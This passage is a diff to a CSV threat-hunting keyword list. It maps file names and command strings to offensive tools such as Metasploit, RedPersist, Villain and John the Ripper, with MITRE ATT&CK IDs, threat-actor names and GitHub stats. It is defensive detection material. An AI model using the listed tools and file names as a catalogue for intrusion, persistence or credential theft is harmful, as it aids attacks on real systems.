live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" -"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*PDF_Payload*Doomfist.pdf*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*pdfcrack -f *.pdf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*pe_packer/dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer/exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer/main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" @@ -14631,21 +14797,21 @@ "*pe_packer\exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer\main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*pe2shc.exe*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*pe2shc_*.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*Pe2Shellcode.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*PEASS-ng-master*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*peCloak*","offensive_tool_keyword","peCloak","peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool","T1027.002 - T1059.003 - T1140 - T1562.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py","1","0","N/A","N/A","1","97","39","2016-03-21T23:38:15Z","2015-08-19T14:46:50Z" -"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*peinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*peinjector.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PELoader/PeLoader.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*pem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Pennyw0rth/NetExec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*-pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PentestBox*","offensive_tool_keyword","pentestbox","PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System","T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://pentestbox.org/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12394","2312","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" +"*PENTESTING-BIBLE*","offensive_tool_keyword","PENTESTING-BIBLE","pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE","1","1","N/A","N/A","10","12397","2308","2023-04-03T07:40:28Z","2019-06-28T11:26:57Z" "*pentest-machine*","offensive_tool_keyword","pentest-machine","Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.","T1583 - T1584 - T1580 - T1582 - T1574","TA0002 - TA0001 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/DanMcInerney/pentest-machine","1","1","N/A","N/A","4","315","106","2018-09-07T20:01:41Z","2015-02-26T23:57:21Z" "*pentestmonkey*","offensive_tool_keyword","Github Username","github repo name - privileges exploitation and offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PE-Obfuscator.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" @@ -14658,7 +14824,7 @@ "*Perform password spraying for all active users on a domain*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*Performing recursive ShadowSpray attack*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*perl nikto.pl -h*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","0","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*perl_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*perl-reverse-shell.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*PersAutorun.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PersCLRInstall.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -14669,18 +14835,18 @@ "*persist runkey*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*persist spe *.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Persist.cna*","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" -"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*Persist\autorun.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\eventviewer.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\powershell.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\screensaver.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\startup.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*Persist\winlogon.cs*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*PersistBOF.cna*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red 